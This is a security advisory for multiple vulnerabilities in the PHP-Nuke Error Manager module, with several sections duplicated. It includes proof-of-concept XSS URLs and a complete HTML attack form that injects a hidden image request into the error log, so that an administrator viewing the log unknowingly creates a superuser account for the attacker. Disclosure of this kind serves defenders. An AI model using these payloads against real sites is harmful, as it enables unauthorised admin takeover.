PHP-Nuke Error Manager Module Multiple Vulnerabilities
BID:9911
Info
PHP-Nuke Error Manager Module Multiple Vulnerabilities
| Bugtraq ID: | 9911 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 18 2004 12:00AM |
| Updated: | Mar 18 2004 12:00AM |
| Credit: | Disclosure of these issues is credited to Janek Vind <[email protected]>. |
| Vulnerable: |
Error Manager PHP-Nuke Module 2.1 |
| Not Vulnerable: | |
Discussion
PHP-Nuke Error Manager Module Multiple Vulnerabilities
It has been reported that Error Manager is prone to multiple vulnerabilities. These issues are due to failure to validate user input, failure to handle exceptional conditions and simple design errors.
These issues may be leveraged to carry out cross-site scripting attacks, reveal information about the application configuration and initiate HTML injection attacks against the affected system.
It has been reported that Error Manager is prone to multiple vulnerabilities. These issues are due to failure to validate user input, failure to handle exceptional conditions and simple design errors.
These issues may be leveraged to carry out cross-site scripting attacks, reveal information about the application configuration and initiate HTML injection attacks against the affected system.
Exploit / POC
PHP-Nuke Error Manager Module Multiple Vulnerabilities
No exploit is required to leverage this issue. The following proof of concepts have been provided:
To leverage the information disclosure issue:
http://www.example.com/nuke71/error.php?newlang=foobar
To leverage the cross-site scripting issue:
http://www.example.com/nuke71/error.php?pagetitle=[xss code here]
http://www.example.com/nuke71/error.php?error=>[xss code here]
To leverage the HTML injection issue, write the following html file and use it against the affected web site. Once the admin views the error logs, an admin user will be created on the affected web site.
<HTML>
<HEAD><TITLE>Error Manager sploit</TITLE>
</HEAD>
<BODY bgcolor="#000000" text="#FFFFFF">
<br><br><br>
<center>
<FORM action="http://www.example.com/error.php" method="POST">
<input type="hidden" name="error" value="<img width='0' height='0' border='0'
src='http://www.victim.com/admin.php?op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&[email protected]&add_radminsuper=1'></img>404">
<input type="submit" value="Attack">
</FORM>
</center>
<br><br><br>
</BODY>
</HTML>
No exploit is required to leverage this issue. The following proof of concepts have been provided:
To leverage the information disclosure issue:
http://www.example.com/nuke71/error.php?newlang=foobar
To leverage the cross-site scripting issue:
http://www.example.com/nuke71/error.php?pagetitle=[xss code here]
http://www.example.com/nuke71/error.php?error=>[xss code here]
To leverage the HTML injection issue, write the following html file and use it against the affected web site. Once the admin views the error logs, an admin user will be created on the affected web site.
<HTML>
<HEAD><TITLE>Error Manager sploit</TITLE>
</HEAD>
<BODY bgcolor="#000000" text="#FFFFFF">
<br><br><br>
<center>
<FORM action="http://www.example.com/error.php" method="POST">
<input type="hidden" name="error" value="<img width='0' height='0' border='0'
src='http://www.victim.com/admin.php?op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&[email protected]&add_radminsuper=1'></img>404">
<input type="submit" value="Attack">
</FORM>
</center>
<br><br><br>
</BODY>
</HTML>
Solution / Fix
PHP-Nuke Error Manager Module Multiple Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
PHP-Nuke Error Manager Module Multiple Vulnerabilities
References:
References: